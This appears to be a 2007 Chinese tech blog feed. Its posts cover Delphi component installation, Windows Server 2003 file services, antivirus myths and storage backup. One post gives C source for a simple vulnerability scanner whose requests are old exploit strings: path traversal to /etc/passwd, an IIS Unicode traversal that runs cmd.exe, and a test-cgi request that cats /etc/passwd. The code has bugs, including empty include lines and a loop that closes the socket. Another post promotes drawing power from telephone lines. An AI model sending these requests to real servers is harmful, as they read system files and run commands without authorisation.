Eric's Tech Space

寝室熄灯后不用怕，从电话线“偷电”啦

noreply@blogger.com (Eric White) — Tue, 16 Oct 2007 13:09:00 +0000

简单的DIY就可获得40-70V的电压，带一盏LED台灯都没问题！果然高手，再也不怕寝室熄灯了。

Free Hidden Electricity! - video powered by Metacafe

blogspot今天居然能访问了

noreply@blogger.com (Eric White) — Tue, 16 Oct 2007 12:53:00 +0000

阔别了数月之后，blogger今天居然又能访问啦！

心情不错，更新留念。

真不知道明天早起，GFW还能不能继续开恩，让我继续看到Blogger那即熟悉而又陌生了的美丽面庞。。。

残念。。。

第三方控件安装方法

noreply@blogger.com (Eric White) — Wed, 01 Aug 2007 03:29:00 +0000

不是由BORLAND提供的组件叫第三方组件：
安装方法：
就目前常见的各种形式的组件的安装方法介绍一下。　

1　只有一个DCU文件的组件。DCU文件是编译好的单元文件，这样的组件是作者不想把源码公布。一般来说，作者必须说明此组件适合Delphi的哪种版本，如果版本不对，在安装时就会出现错误。也正是因为没有源码，给使用者带来了不便，那就是一旦Delphi版本升级，此组件就不能再使用了，当然有的作者给出了几种版本的DCU文件，用户根据需要选择使用。这样的组件的安装方法是：在Component菜单中，选择install component，在对话框
"into existing package"页中，单击“Unit file name”后的“Browse”按扭，在打开的文件对话框中，将“文件类型”设定为*.dcu，找到要安装的DCU文件，按OK按钮返回"into existing package"页后再按OK按钮就可以安装了。注意，此时Delphi会提示dclusr40.dpk将被重建，是否继续，OK就可以了。这里是将组件安装到dclusr40.dpk包中，此包从文件名上可以看出是用户自定义组件包，先安装到这个包中吧，下面再讲有关注意事项。安装完毕会有已经将组件注册完的提示信息以及安装到哪个组件页中的信息等，到组件面板上看看，一般会出现一个新的组件页，其中有刚安装的组件。　

2、只有PAS文件或既有PAS又有DCU文件的组件。这种组件因为有PAS文件，也就是说作者提供了源码，这就好办多了。安装的方法和上面是一样的，在文件类型中可以设定为DCU也可以设定为PAS，建议设定为PAS，这样可用你的Delphi重新编译一下，看是否会出现问题。Delphi升级后只能选择 PAS文件安装，这样才能重新编译，使得组件能适应新Delphi版本。这样的组件是很值得使用的，根据心铃的经验，没有源码的组件最好不要使用，一是存在Delphi版本升级后无法使用的问题，再者当程序出现问题后用户无法调试组件来判断是否是组件中存在BUG。　

3、有dpk文件的组件包。带有dpk文件的组件包一般是有多个组件构成的，也就是说安装后会有多个组件供使用，如果只有一个组件作者一般不会制成DPK 文件，使用上面的方式发布就可以了。对于这样的组件包，一般来说会有详细的安装说明文件，如上面提到的RXLIB，由于组件复杂且安装时有先后顺序，作者不提供安装说明用户根本无法正确安装。如果没有安装说明文件，那么用下面的方法安装：在File菜单下，选择”OPEN…”打开dpk文件(文件类型列表框中选*.dpk)，在出现的Package窗口中，工具栏上有Install按钮，按此按钮即可进行安装。如果Install按钮处于无效状态，那么先按Compile按钮编译，一般来说编译之后Install按钮就会处于有效状态，此时再按Install按钮就可以了。　

4、带有Bpl文件的组件包。一般来说这也是由多种组件构成的组件包，它其实是一个动态连接库文件（DLL）。对于这种组件包的安装方法是：在 component菜单下选择“install packages”，然后单击Add按钮，在打开的文件对话框中找到相应的bpl文件打开返回后，再单击Ok按钮就可以了。　

5、ActiveX控件的安装。要安装这类控件，需要先用regsvr32.exe注册，然后选择Component菜单中Import ActiveX Control项。在Import ActiveX Control打开的窗口中，只有已经注册的ActiveX控件才出现在列表中，选中一个然后按Install按钮就可以安装了。如果事先没有用 regsvr32.exe注册也可以按ADD按钮找到OCX文件即时注册，注册后再进行安装。

几点说明：

1 在拿到组件后先看是否有说明文件，一般来说在说明文件中有如何安装的指导，有些还会有组件的属性、事件、方法的使用说明，这些在使用时是非常重要的。

2　在上面的组件（包）安装操作之前，最好将 *.bpl拷贝到你的System目录中，将 *.pas、*.dcu、*.dcr、*.dp?拷贝到Delphi的Lib目录中再进行。

3　前面我们提到安装DCU组件时，选用的是已经存在的dclusr40.dpk，当然也可以选择安装到一个新的包中，如果选择新包，需要先取一个名字比如DEMO，事实上安装完毕后用户可以找到的是Demo.bpl，而找不到DEMO.DPK。假如你已经将一个组件安装到dclusr40.dpk中了，还想再安装一个组件，如果再安装到dclusr40.dpk中，安装后你得到提示，原来安装的那个组件已经被取消注册，你将无法使用了。这样不就成了只能安装一个组件了吗？除非你再安装到一个新的包中才可以两个组件同时使用。当然每安装一个组件生成一个新的BPL文件也未偿不可，但BPL文件就增加许多。能否在dclusr40.dpk中多安装几个组件呢？当然是可以的。方法如下：用File菜单下的OPEN打开dclusr40.dpk文件，单击ADD 按钮，在打开的对话框中选择ADD UNIT页面，按Unit file name后的“Browse”按钮打开组件单元文件，OK即可，用此种方法这样可添加多个组件的单元文件，添加完毕，按一下编译按钮，然后再按 Install按钮即可，如果单元文件是编译好的（DCU）可以直接按安装按钮。

4　组件的删除。光会安装可不行，还要会删除呀。很简单，在component菜单下，选择install packages，在列表中找到安装所在的Bpl，按Remove按钮，ok！再把Bpl文件删掉就彻底了，如果不删除BPL文件，下次可以按安装BPL 组件的方法再安装使用

Windows 2003搭建安全服务器

noreply@blogger.com (Eric White) — Sun, 22 Jul 2007 07:01:00 +0000

启用并配置文件服务

Windows Server 2003的管理工具中有一项功能叫做“管理您的服务器”，启动该工具之后，可以看到当前服务器上启用的所有服务，并可对这些服务进行管理。

点击该界面上的“添加或删除角色”链接，将启动一个配置服务器的向导。点击“下一步”进入到“服务器角色”步骤，在Windows Server 2003支持的角色列表中选择文件服务器并点击“下一步”，开始启用和配置文件服务的过程。

根据系统提示进行配额设置，磁盘配额功能可以限制用户对磁盘空间的使用，方便进行磁盘空间管理。将磁盘空间限制设置为300MB，将警告设置为260MB，并勾选“拒绝将磁盘空间给超过配额限制的用户”这一选项。

这种情况下用户将无法使用超过300MB以上的硬盘空间，并且当用户使用的空间达到设置的260MB的警戒线时记录一个系统事件。

完成配额设置后点击“下一步”进入索引服务设置界面，默认的选项是不启用索引服务。虽然索引服务可以加快文件检索的速度，但是由于它要消耗不少的服务器资源，所以如果不需要很频繁检索文件的话，建议保留默认的设置。

在确认以上设置之后，安装向导会弹出一个用于建立共享文件夹的向导。首先需要选择共享文件夹的路径，例如C:/Inetpub/home。之后进入维护共享名和关于该共享描述的界面，通常情况下维持默认设置即可。点击下一步开始为共享设置权限，基本的权限包括了完全访问和读写权限。

选择“使用自定义共享和文件夹权限”，点击自定义按钮之后弹出自定义权限设置界面。在这里可以根据需要对不同用户设置不同的权限，例如可以对Administrators用户组设置完全控制以赋予所有管理员对该共享文件夹的全部管理权限，为Guest用户设置读取权限，使匿名用户可以下载该文件夹中的文件，同时删除原有的Everyone这项，屏蔽所有其他用户权限。

至此就完成了基本的共享设置，如果还有其他文件夹需要设置成共享，可以在关闭该向导之前勾选“关闭后再次运行该向导”的选项继续进行下一个共享的设置。结束所有向导之后，可以看到“管理您的服务器”界面中多了一项文件服务器的内容，点击“管理此文件服务器”链接就可以打开文件服务器管理界面，在此可以进行各种文件服务的管理。

另外，在进入右键菜单的属性条目时，也可以进行共享和权限等管理，但是只有在点击的对象是磁盘分区的时候才能应用配额功能，因为配额功能是针对磁盘卷来执行的，而且该卷必须是NTFS格式的。

文件的备份与还原

由于数据的安全性和可用性对于文件服务器来说也是非常重要的，所以在设置完文件服务器的权限和配额等参数之后，需要对文件进行备份和还原工作。Windows Server 2003的备份功能使用了称为卷影副本（Volume Shadow Copy）的技术。

在文件服务器管理界面可以找到“备份文件服务器”链接，在命令行执行ntbackup命令可以获得与点击该链接相同的效果，即执行备份向导。

将“总是以向导模式启动”的选项勾掉，在下次执行该命令的时候即可直接进入“备份工具”界面。在该界面中可以看到，Windows Server 2003除了备份和还原功能之外还包括了一项称为自动系统恢复向导（AMR）的功能，该功能主要用于对系统分区进行备份，这里主要讲解以卷影副本技术为基础的标准备份功能，用户可以根据系统指示进行操作。

卷影副本功能以事先计划的时间间隔为存储在共享文件夹中的文件创建备份，并且可以将文件恢复成任意一次备份时的版本。卷影副本的恢复行为可以在客户端进行，有效地提高数据还原的效率，不用每次都麻烦管理员来进行操作，用户也可以随时进行和自己数据相关的还原操作。

进行这些操作需要客户端机器上安装卷影副本客户端程序，通过这台客户端机器浏览到文件服务器上的共享之后，对该共享或该共享中的文件点击右键，其属性对话框中有一个“以前的版本”选项页。在这里显示了文件以前保存过的所有版本，可以将其恢复成任意一个版本。

只有管理员组的成员可以设置卷影副本功能，并且卷影副本必须在NTFS格式的磁盘卷上才能实现。卷影副本默认在启用该功能的卷上保留10%的空间用以保存备份数据（最少100MB），一旦超过空间的限制将覆盖早先创建的副本。

启用卷影副本功能非常简单，在文件服务器管理界面中找到“配置卷影副本”链接，也可以在NTFS卷的右键属性菜单里找到卷影副本的选项页，通过这两种方式可以进入同样的管理界面，实现对卷影副本的启用、禁用以及容量和时间计划等设置。

在“备份工具”管理界面中，用户可以指定哪些文件（包括系统注册表数据及引导文件等）需要参与到备份计划中来，也可以指定执行这些备份操作的时间计划。这些备份操作都是基于卷影副本技术的，备份的结果文件要稍大于备份的内容。

建议用户维护一个按周进行的备份操作，将所有数据重新备份一次，备份过的文件将被标记为“已备份过”；在此同时维护一个按日进行的差异备份计划，备份那些每天修改过的文件。应用这种组合计划进行数据备份更加便于管理，而且能够有效保证数据的可恢复性。

需要注意的是：卷影副本备份占用空间的数量不仅仅取决于备份文件的大小，更决定于文件修改的频率，对于系统分区这样有很多交换文件操作的分区来说，不要进行整个磁盘卷的备份操作。

分布式文件系统

分布式文件系统是Windows系统网络存储构架的核心技术之一，可以实现将网络上位于不同位置的文件挂接在统一命名空间之下。在管理工具中启动“分布式文件系统”工具，首先要建立一个根目录。用右键点击管理界面左侧的“分布式文件系统”，选择“新建根目录”，按照向导填写所需要的信息就可以完成操作。

继续用右键点击刚刚建立的根目录，选择“新建链接”，可以将位于网络中其它计算机上的共享目录链接到刚才建立的根目录上。将所有要汇集到这个根目录上的共享目录都链接过来之后，就可以通过浏览这个根目录下的目录树访问这些文件，而不再需要通过访问多个实际的网络位置使用这些文件。

后记

在这篇文章中笔者介绍了在一台Windows Server 2003服务器上配置文件服务功能，并着重讲解了建立共享、配额管理、权限设置和备份方面的操作。本文中的大部分内容也适用于Windows 2000服务器。Windows Server 2003还有一些更高级的文件功能可以在文件服务器上进行应用，例如文件加密、虚拟磁盘等。

编写漏洞扫描器方法

noreply@blogger.com (Eric White) — Sun, 22 Jul 2007 00:40:00 +0000

一、漏洞扫描器基本原理：

编写漏洞扫描器探查远程服务器上可能存在的具有安全隐患的文件是否存在，它的socket建立过程和上面的端口扫描器是相同的，所不同的是漏洞扫描器通常使用80端口，然后对这个端口发送一个GET文件的请求，服务器接收到请求会返回文件内容，如果文件不存在则返回一个错误提示，通过接收返回内容可以判断文件是否存在。发送和接收数据需要使用函数send()和recv()，另外对流中存在的字符串进行判断需要使用函数strstr()，这除了需要具备socket函数库的知识以外，还需要一些有关string函数库的知识。

二、简单的漏洞扫描源代码：

/********************************************/
/* 端口扫描器源代码 */
/* CgiScanner.cpp */
/********************************************/

#include
#include
#include

int main(int argc,char *argv[])
{
if(argc!=2){
printf("Useage : scan [IP address]\n");
return(1);
}

struct sockaddr_in blah;
struct hostent *he;
WSADATA wsaData;
int i;
WORD wVersionRequested;
SOCKET sock;

char buff[1024];
char *ex[10];
ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";
ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";
ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";
ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";
ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";
char *fmsg="HTTP/1.1 200 OK";

wVersionRequested = MAKEWORD( 1, 1 );
if (WSAStartup(wVersionRequested , &wsaData)){
printf("Winsock Initialization failed.\n");
exit(1);
}

if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.\n");
exit(1);
}
sock = socket(AF_INET,SOCK_STREAM,0);
blah.sin_family = AF_INET;
blah.sin_port = htons(80);
blah.sin_addr.s_addr= inet_addr(argv[1]);

if ((he=gethostbyname(argv[1]))!=NULL){
memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);
}
else{
if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){
WSACleanup();
exit(1);
}
}

for (i=1 ; i<7; i++) {
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){
send(sock,ex[i],strlen(ex[i]),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound :%s\n", ex[i]);
}
}

closesocket(sock);
WSACleanup();
return(1);
}
}

这段代码可以检测六个漏洞，读者可以根据自己的需要增加漏洞扫描的数量。程序实现的很简洁，概括起来这段程序完成了一下四项工作：

1、连接目标主机SERVER；
2、向目标主机发送GET请求；
3、接收目标返回数据；
4、根据返回数据判断文件是否存在。

揭秘十大杀毒误区

noreply@blogger.com (Eric White) — Fri, 20 Jul 2007 14:36:00 +0000

对染毒软盘DIR操作会导致硬盘被感染

　如果计算机的内存没有病毒，那么只有在执行了带有病毒的程序（文件）后，才会感染计算机。而DIR命令是DOS的内部命令，不需要执行任何外部的程序（文件），因此对染毒软盘进行DIR操作不会感染病毒。　　

　　不过需要注意的是，如果计算机内存已有病毒（或者说计算机已染毒），如果对没有染毒的软盘进行DIR操作，就可能感染软盘。说可能会感染是因为有些病毒不会通过DIR操作传播。

　　将文件改为只读方式可免受病霉的感染　　

　　某些人认为通过DOS的外部命令ATTRIB，将文件设置为只读会十分有效地抵御病毒。其实修改一个文件的属性只需要调用几个DOS中断就可以了，因此说ATTRIB命令对于阻止病毒的感染及传播几乎无能为力。　　

　　病毒能感染写保护的磁盘　　

　　由于病毒可感染只读文件，不少人由此认为病毒也能修改在写保护磁盘上的文件。事实上，磁盘驱动器可以判断磁盘是否写保护，是否应该对其进行写操作，这一切都是由硬件来控制的，您可以物理地解除pc的写保护传感器，却不能用软件来做这件事。　　

　　如果您的软驱是正常的，而软盘的写保护一次也没有取下来，绝对不会感染病毒。但是如果您取下来了，并且用带毒的机器DIR过，则完全有可能感染病毒。注意这个DIR是从机器向软盘感染病毒，而不是把病毒从软盘传染到机器。　　

　写保护和文件只读方式不同，设置文件只读方式是通过计算机，所以病毒能插上一手，可是写保护非要人手参与不可，病毒可没办法把写保护弄掉。计算机不能对写保护磁盘进行改写，这是任何操作都无法改变的（除非您把驱动器弄坏）。　　

　　反病毒软件能够杀除所有已知病毒　　

　　病毒感染方式很多，有些病毒会强行覆盖执行程序的某一部分，将自身代码嵌入其中，以达到不改变被感染文件长度的目的，被这样的病毒覆盖掉的代码无法复原，因此这种病毒是无法安全杀除的。病毒破坏了文件的某些内容，在杀除这种病毒后是不能恢复文件的原貌的。

　　使用杀毒软件可以免受病毒的侵扰　　

　　目前市场上出售的杀毒软件，都只能在病毒泛滥之后才“一展身手”。但在杀毒之前病毒已经造成了工作的延误、数据的破坏或其他更为严重的后果。所以，应该选择一套完善的反毒系统，它不仅应包括常见的查、杀病毒功能，还应该同时包括有实时防毒功能，能实时地监测、跟踪对文件的各种操作，一旦发现病毒，立即报警，只有这样才能最大程度地减少被病毒感染的机会。　　

　　磁盘文件损坏多为病毒所为　　

　　文件的损坏有多种原因，电源电压波动、掉电、磁化、磁盘质量低劣、硬件错误、其他软件中的错误、灰尘、烟灰、茶水，甚至一个喷嚏都可能导致数据丢失。以上所举对文件造成的损坏，会比病毒造成的损失更常见，更严重。

如果做备份的时候，备份了病霉，那么这些备份是无用的　　

　　有两种情况：
①软盘备份：备份中含有引导型病毒。这种情况下，只要不用这张软盘试图启动您的计算机，它将和无毒备份一样安全。
②磁带备份：备份中的数据文件中不会有病毒，如果其中的可执行文件中含有病毒，那么执行文件就白备份了，但是备份中的数据文件还是可用的。

　　反病毒软件可以随时随地防范任何病霉　　

　　很显然，这种反病毒软件是不存在的。新病毒不断出现，要求反病毒软件必须快速升级。对抗病毒，我们需要的是一种安全策略和一个完善的反病毒系统，用备份作为防病毒的第一道防线，将反病毒软件作为第二道防线。同时，软件的及时升级是加固第二道防线的唯一方法。使用反病毒软件是为了辅助防毒，它不可能是刀枪不入的保缥。　　

　正版软件不会带病毒，可以安全使用　　

　　计算机用户常被告知，“为了防范病毒的侵害，不要使用来历不明的软件”。这话不错，所谓“来历不明的软件”确实是计算机病毒传播主要途径之一。那么使用有“来历”的软件是否就可以高枕无忧呢？非也！实际上计算机报刊媒体已经多次报导过“正版软件”。“商品软件”带病毒问题。使用商品软件也不可掉以轻心，甚至新购买的计算机包括　　

　　原装计算机在使用前都须进行病毒检测。如确实由于原版软件带有病毒而造成重大的损失，应寻求法律保护。　　

　　不用软盘，不会感染病毒，因而无需选择杀毒软件　　

　　“不用软盘，就不会感染病毒”是常在初级用户中听到的一种言论，它和“使用软盘，就会感染病毒”是一对孪生姊妹，是两种相同类型的错误论调。　　

　　病毒的传染是通过带病毒软件进行的，但软盘并不是“带病毒软件”的唯一载体。可以说，凡是可以得到程序（软件）的地方，都可能“得到”病毒。也就是说，使用光盘、硬盘、磁带，或者通过局域/广域网络、Internet、BBS（电子公告板）使用或下载软件，都潜在感染病毒的危险。尤其是近年来Internet和BBS的广泛使用，使得国内外病毒大面积、高速度的流行传播成为可能。这些具有国际性的计算机信息传播媒体，是潜在的病毒毒源和导管（当然，这些网络体系中也具有安全性较高的防/杀病毒系统），使每一个计算机用户都受到染毒的威胁。 —恐怕没有人会说他的计算机永远不会连上Internet。　　

　人不可能不生病，所以计算机绝不可能不感染病毒，所以您必须选择杀毒软件。

　 “能杀毒的就行”和“有一个杀毒软件就够了”　　

　　“能杀毒的就行”和“有一个杀毒软件就够了”，这是一部分人在选择杀毒软件时的想法。一种常见的情况是，当您的计算机不正常时，找来一大堆杀毒软件，不管是正版还是盗版，能查能杀病毒就是好样的。其实很多计算机的故障并不是病毒导致，这样，很多的杀毒软件都“无效”；另一种更常见的情况是用户一般并不注意“查毒”与“杀毒”的区别，使用某种杀毒软件时，首选“杀毒”操作。于是，当它用这种杀毒软件将系统“杀毒”了一次以后，用其他杀毒软件，就再也找不到病毒了，那就认定这个软件是最好的。　　

　　目前还没有一个杀毒软件能囊括所有病毒而杀之，这是谁也做不到的。由于各种病毒标本的来源不同，再加上程序编制者的实力有别，总存在一种软件能查杀的病毒，别的软件却不能查杀。或者由于一些程序BUG（程序错误），使某些软件本来可以查杀的病毒，在它的一些版本中却不能查杀或误查误杀了。所以一般不建议用户革一的选择一种杀毒软件。　　

　　在选择杀毒软件时，请首先抛开您所有关于“好”与“不好”的成见，也拒绝广告词上的种种诱惑，认真地去了解一下杀病毒软件厂商在技术实力、服务质量、软件性能等方面的东西。特别应该了解软件厂商在升级、退货、损坏更换等方面的措施和承诺的可信度。同时，您应该请厂商直接阐述一下他们在广告中的各种术语的具体含义，要知道，这是您作为消费者的合法权益。　　

　　现在的反病毒软件市场就像“战国时代”，各家都说各家好。但消费者感到不放心，到底用谁的软件好？只用一个好还是用几个好？世上没有“万灵丹”，一个软件再好，也不是所有的病毒都能杀，不能“包治百病”。各软件厂家获取病毒样本的时间不同，因此，在每一个时间段，各软件厂家都是各有侧重，只有一个不保险。除了“万能的主”之外，这个世界上恐怕再也找不到万能的东西了。为防止“重复建设”，专家认为，选购两个优势互补的反病毒软件即可，这是提高“安全系数”的最佳方法。千万别把好几个反病毒软件都在同一台计算机上安装，大多了没必要，而且有可能出现相互之间抢占资源、判断失误、死机等问题。　　

　发现CMOS中有病毒　　

　　CMOS是微机中的一种特殊存储器，记录了微机的硬件设置参数及系统日期时间。开机密码等重要数据。由于CMOS设置十分重要，所以可能成为计算机病毒破坏攻击的目标。目前确实已发现了改写CMOS的“CMOS设置破坏者”病毒，但在CMOS中并不存在病毒。　

　　有时，机器发生问题，问题出在CMOS设置上，有人认为，这是躲藏在CMOS里面的病毒！因而误认为杀毒软件不行，采取对CMOS存储器又是放电、又是短路的措施，重新设置CMOS参数后，机器恢复了正常，从此确信CMOS中有病毒。这种行为及其危险，很容易将主板搞坏。我们说“CMOS设置破坏者病毒，不等于CMOS中有病毒！病毒不能将自身自动传染到CMOS里面而存留和被激活！”，“病毒可以将CMOS设置改变或加密，但用户也可以重新设置和恢复。”　　

　　某些情况下，如CMOS电源不足、外界电源冲击性波动、软件崩溃、硬件不稳定、操作上的失误、病毒改写等都会导致CMOS设置紊乱，也可以说，是紊乱性加密，因而，造成机器不能引导或不能正常工作。这时，一般情况下可以重新对CMOS设置和用专用软件来清理紊乱性密码，然后再设置正确参数。

　　 CMOS中不会有病毒寄生，因为：　
　
　（1）CMOS是通过I/O读写与cpu交换数据的，CPU的物理机能决定了只能读写CMOS的数据，不能把CMOS中的数据当作指令代码来执行。而病毒想要工作的话就一定要执行其程序码，但CMOS只是用来存放数据的，在CMOS中的数据不是可执行的，所以并没有CMO5病毒，只有会破坏CMOS数据的病毒。

　　（2）如果把一段病毒程序写入CMOS,则必然破坏微机的硬件设置以至于微机根本不能运行，存储在CMOS中的“病毒程序”将毫无作用，病毒不能在CMOS中蔓延或藏身于其中。　　

　　（3）CMOS的有效存储容量只有128个字节，不足以容纳病毒。可见CMOS不具备病毒寄生和被激活的条件，不可能有病毒存在。　　

　　发现Cache中有病毒　　

　　与CMOS中没有病毒一样，Cache中也是根本不可能存在病毒的。　　

　　我们知道，程序执行时，数据流是这样被传送的：　　

　　外存（软/硬盘）

　　网络=>内存（RAM）=>Cache->CPU　　

　　 Cache物理器件上是一块高速缓存芯片，它被设置在RAM与CPU之间，是RAM到CPU的一条必由通道。由于CPU的运算速度越来越快，而计算机的内存（RAM）的速度总是显得跟不上CPU。“为了缓解CPU与RAM之间的速度矛盾，一般采用在它们之间加入一块高速缓存芯片Cache，使同一时间下RAM为CPU准备的代码不再是单一的指令/数据，而是一长段指令序列或可访问数据块。　　

　　可见Cache中存放的是非静态数据（计算机用语中的“数据”包括“程序代码”），它总是随程序的执行在不断刷新，被RAM中的数据不断更换。它的内容总是RAM中数据的某一部分的备份。　　

　　如果RAM中有了病毒，其病毒代码将经由Cache送到CPU，由CPU解码执行。病毒代码“流经” Cache这一现象并不能称为“有Cache病毒”，就好像我们不能因为病毒代码在CPU中执行就认为有CPU病毒一样。事实上，从PC机的组成原理来看，所有病毒都必须经由Cache进入CPU，因为所有正常或非正常数据都是这样进入CPU中解码执行的。　　

　　此外，Cache中不可能有病毒的重要原因之一也在于Cache不能被软件编址，无法人为控制。

　　和CMOS不一样的是，Cache并没有专用电源供电。因而Cache中的数据将在关机后自动清除，在开机时自动刷新。这样的环境中的“病毒”是既无法存储又无法复制的。可见，Cache并不是病毒的安乐窝，没有人会考虑在这样的环境中置放病毒。　　

　病毒不感染数据文件　　

　通常是这样。因为病毒是一段程序，而数据文件一般不包含程序，当然就不会感染病毒.TXT、.PCX等文件因为肯定不包含程序，所以可能不会感染病毒。不过有些病毒会破坏各种文件，所以备份数据文件还是非常必要的。作为例外的是，若数据文件包含了可执行码，那么它就能够被病毒感染了。关于这方面的一个好的例子microsoft Word文件（.DOC和.DOT）。虽然word文件是技术上的数据文件，但Word中可以包含一段程序，因此它们能够容纳病毒，并因为是可执行文件，故而是容易受病毒感染的。目前大部分的病毒感染报告都是来源于宏病毒。　　

　安装有实时杀毒功能的防火墙，就万事大吉了　

　　有很多用户持一种错误的观念，以为只要买了杀毒软件，特别是只要安装了有实时杀毒功能的防火墙，就能挡住所有病毒，万事大吉了—这是大错而特错的。从1999年4月26日CIH病毒大发作的情况来看，安装了病毒防火墙且于1998年9月以后至少升级过一次的，都没有受到CIH病毒的攻击，而那些虽然安装且运行病毒防火墙，却太久没有升级的用户，有相当大的比例不幸成为CIH病毒的牺牲品。究其原因，完全是没有及时升级，使原有的杀毒软件无法具备防范查杀、阻击CIH病毒的能力。因此，我们要再一次特别郑重地提醒用户，不管您使用的是什么样的杀毒软件，它的生命力在于及时地不停升级，否则，当一个全新的病毒袭来的时候，旧版本的杀毒软件将会形同虚设。请用户一定要随时关注反病毒厂家关于新病毒的流行通报，及时升级，以免造成不必要的损失。

解析不同存储环境下的数据保护策略

noreply@blogger.com (Eric White) — Thu, 19 Jul 2007 09:29:00 +0000

数据存储备份和存储管理源于上世纪70年代的终端/主机计算模式，当时由于数据集中在主机上，因此，易管理的海量存储设备----磁带库是当时必备的设备。80年代以后，由于pc的发展，尤其是90年代应用最广的用户机/服务器模式的普及以及互联网的迅猛发展，使得存储容量、存储模式和存储要求都发生了根本性的变化，一些新兴的存储技术迅速崛起，为构建一个更安全的信息时代提供了更多的选择。

如何确保所有数据能够得到可靠备份，及时进行灾难恢复是存储管理软件的核心任务。此外存储管理软件还存在以下一些基本功能，诸如改进系统和应用I/O性能及存储管理能力，提高数据和应用系统的高可用性，减少由于各种原因中断数据存取或者应用系统宕机的时间，实现技术有分级存储管理(HSM)、ClusterServer(集群服务器)等。

通过管理软件管理数据

数据管理的首要是能提供一些可以识别和分析存储访问模式的VolumeManager工具。VolumeManager透过复杂的磁盘配置能均衡I/O负载，在不影响应用的同时能够优化应用数据的布局。它还可将数据条形散放到多个物理盘上以提高性能，同时还具有在不中断应用的情况下，识别和消除性能瓶颈的能力，从而增强系统和应用的性能。另外，VolumeManager在减少系统中断时间、增加数据完整性等方面也有不俗表现。它允许对磁盘进行在线的管理和修改配置，减少对系统产生极大影响的停机时间，同时利用冗余技术提高数据可用性，防止数据被丢失和破坏。

其次还有一个非常重要的可快速恢复的日志式文件系统FileSystem，它能在不间断数据访问的条件下，对文件作在线备份，并在系统重启或崩溃前允许访问数据并恢复文件，从而大大提高用户和管理员的生产效率。FileSystem在系统崩溃前还能将未完成的数据记录在一个事件日志中，利用恢复程序重现，从而保持了数据的完整性。

VolumeManager和FileSystem都工作在操作系统一级，可实现集群与故障恢复、自动管理、备份与HSM以及基于浏览器的远程管理等。两者有机结合后，利用双方特有的对磁盘和数据的管理能力，能给企业的系统提供尽可能高的性能、可用性及可管理性。

数据存储备份技术一般包含硬件技术及软件技术等，硬件技术主要是磁带机技术，软件技术主要是通用和专用备份软件技术等。我们主要从软件技术方面加以讨论。备份软件技术在整个数据存储备份过程中具有相当的重要性，因为它不仅关系到是否支持磁带的各种先进功能，而且在很大程度上决定着备份的效率。最好的备份软件不一定就是操作系统所提供的备份功能，很多厂商都提供了许多专业的备份软件。专业备份软件能透过优化数据传输率，即可以自动以较高的传输率进行数据传输。这不仅能缩短备份时间、提高数据存储备份速度，而且对磁带机设备本身也有好处。另外，专业备份软件还支持新磁带机技术，如hp的TapeAlert技术，差不多所有主流专业备份软件均提供支持。

不同存储环境的数据保护策略

网络正成为主要的信息处理模式，需要存储的数据大量增加，数据作为取得竞争优势的战略性资产其重要性在增加。NAS将存储设备透过标准的网络拓扑结构(例如以太网)，连接到一群计算机上。重点在于帮助工作组和部门级机构解决迅速增加存储容量的需求。这种方法从两方面改善了数据的可用性。第一，即使相应的应用服务器不再工作了，仍然可以读出数据。第二，简易服务器本身不会崩溃，因为它避免了引起服务器崩溃的首要原因，即应用软件引起的问题。另外，NAS产品是真正即插即用的产品，其设备的物理位置非常灵活。
SAN(存储局域网络)透过光纤信道连接到一群计算机上。在该网络中提供了多主机连接，但并非透过标准的网络拓扑，并且透过同一物理通道支持广泛使用的ScsI和IP协议。它的结构允许任何服务器连接到任何存储数组，这样不管数据置放在哪里，服务器都可直接存取所需的数据。SAN解决方案是从基本功能剥离出存储功能，所以运行备份操作就无需考虑它们对网络总体性能的影响。这个方案也使得管理及集中控制实现简化，特别是对于全部存储设备都集群在一起的时候。
集群通常用于加强应用软件的可用性与可扩展性。某些集群结构技术会加入单一系统印象的概念，可从单点以单一系统的方式来管理多台计算机。集群服务器可支持多达上百台互相连接的服务器，结合为松散结合的单位来执行作业，保护彼此的应用软件免于故障。由于集群服务器可完全整合应用软件服务结构，因此可建置高效的应用软件执行环境，即使整个系统出现故障，终端计算机都还可以使用几乎所有的应用软件。集群服务器软件包括引擎、编译器、负载计算器、代理、指令与图形化系统管理接口等组件。集群化运算环境的最大优势是卓越的数据处理能力。原则上，任何类型的多重主机结构存储设备，包括直接连接的磁盘，都可以用来当作集群数据存储设备。为求得最大的系统可用性，最适合使用拥有多重主机存取路径的容错或高可用性存储子系统。分层次的管理方式可以解决存储容量不断增长导致的如何有效扩充容量的问题。在很多情况下，它更多地用于分布式网络环境中。分级，其实就是意味着用不同的介质来实现存储，如RAID系统、光存储设备、磁带等，每种存储设备都有其不同的物理特性和不同的价格。例如，要备份的时候，备份文件一般存储在速度相对比较慢、容量相对比较大、价格相对比较低的存储设备上如磁带，这样做很经济实用。那么如何实现分级呢?从原理上来讲，分级存储是从在线系统上迁移数据的一种方法。文件由HSM系统选择进行迁移，然后被拷贝到HSM介质上。当文件被正确拷贝后，一个和原文件相同名字的标志文件被创建，但它只占用比原文件小得多的磁盘空间。以后，当用户访问这个标志文件时，HSM系统能将原始文件从正确的介质上恢复过来。分级存储可以有不同的实施方式，HSM根据两级或三级体系将动态迁移/回迁的数据分类，从而实现分级存储。存储应用的深入必然带来对整体解决方案的需求，这不仅包括硬件，还包括相应的软件以及服务。一个软硬件兼容的融合应用环境是大势所趋。比如，存储虚拟化的提出就证明了这一趋势。因为它有利于提高存储利用率、简化管理和降低成本，构建一个融合的存储应用大环境。总之，随着网络技术的发展、计算机能力的不断提高，数据量也在不断膨胀。数据备份与恢复等存储技术方面的问题显得越来越重要，存储管理技术的发展必将引起业界的高度重视.

常见拒绝服务攻击类型及分析

